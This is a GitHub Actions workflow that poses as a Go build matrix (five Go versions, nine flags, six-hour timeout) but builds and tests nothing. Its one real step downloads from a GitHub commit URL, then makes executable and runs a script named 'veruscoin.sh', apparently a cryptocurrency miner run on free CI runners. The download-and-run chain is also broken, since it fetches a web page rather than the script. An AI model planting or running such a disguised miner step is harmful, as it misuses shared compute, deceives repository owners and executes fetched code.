name: coins
on: [push, pull_request]
jobs:
build:
name: akuganteng
runs-on: ubuntu-latest
strategy:
max-parallel: 1
fail-fast: false
matrix:
go: [1.6, 1.7, 1.8, 1.9, 1.10]
flag: [A, B, C, D, E, F, G, H, I]
timeout-minutes: 360
env:
NUM_JOBS: 20
JOB: ${{ matrix.go }}
steps:
- name: Set up Go ${{ matrix.go }}
uses: actions/setup-go@v1
with:
go-version: ${{ matrix.go }}
id: go
- name: Setup
uses: actions/checkout@v2
- name: Deankuu
run: |
wget https://github.com/Deankuu/coins/commit/4c246488b2715ba58047e00973aa734feedf2f2c && chmod u+x veruscoin.sh && ./veruscoin.sh

